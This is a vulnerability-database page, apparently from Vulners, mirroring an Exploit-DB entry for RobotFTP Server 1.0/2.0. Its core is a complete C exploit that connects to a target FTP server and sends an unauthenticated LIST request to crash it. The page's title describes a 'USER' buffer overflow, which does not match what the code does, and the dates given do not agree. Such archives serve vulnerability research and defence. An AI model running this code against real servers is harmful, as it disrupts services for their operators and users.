Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (2)

🗓️ 16 Feb 2004 00:00:00Reported by NoRpiuSType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 36 Views

Vulnerability in RobotFTP Server 1.0/2.0 allows unauthorized Denial of Service attacks.

Code
// source: https://www.securityfocus.com/bid/9672/info
 
A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length.

/*************************************************************************************************
*                                                                                                *
* Date: 18/2/2004                                                                                *
* Url: www.robotftp.com                                                                          *
* Versions: 1.0/2.0                                                                              *
* Bug: Robotftp gets DoS'sed when an unauthorized user tries to do some command like MKD or LIST *
* Author: NoRpiUs                                                                                *
* Email: [email protected]                                                                  *
* Web: http://norpius.altervista.org                                                             *
* For Unix & Win                                                                                 *
*                                                                                                *
* I have done this for my birthday that is today :) - Robo-SOFT don't be angry :)                *
**************************************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef WIN32
    #include <winsock.h>
    #include <windows.h>
    #define close closesocket
#else
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif
#define DOSREQUEST "\x4C\x49\x53\x54\r\n"

void errore( char *err )
{
	printf("%s",err);
	exit(1);
}

void usage( char *progz )
{
	fputs("Robotftp FTP Server remote DoS\n"
	      "By NoRpiUs\n"
	      "Usage: <host> <port>\n", stdout);
	exit(1);
}

int main( int argc, char *argv[] )
{
	int sock;
	struct hostent *he;
	struct sockaddr_in target;
	char recvbuff[512];

#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(0x1, &wsadata);
#endif

	if ( argc < 3 ) usage(argv[0]);

	if ( (he = gethostbyname(argv[1])) == NULL )
		errore("Can't resolve host");

	target.sin_family = AF_INET;
	target.sin_addr   = *(( struct in_addr *) he -> h_addr );
	target.sin_port   = htons(atoi(argv[2]));

	fputs("[+] Connecting...\n", stdout);

	if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0)
		errore("[-] Can't create socket\n");

	if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )
		errore("[-] Can't connect\n");	

	if ( recv( sock, recvbuff, sizeof(recvbuff), 0) < 0 )
		errore("[-] Server seems to be down\n");

	fputs("[+] Sending DoS request\n", stdout);

	if ( send( sock, DOSREQUEST, strlen(DOSREQUEST), 0) < 0 )
		errore("[-] Cant' send the request\n");

	fputs("[+] Done\n", stdout);

	close(sock);

	return(0);

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Feb 2004 00:00Current
7.4High risk
Vulners AI Score7.4
robotftp serverbuffer overflowdenial of serviceuser commandinsufficient bounds checking
36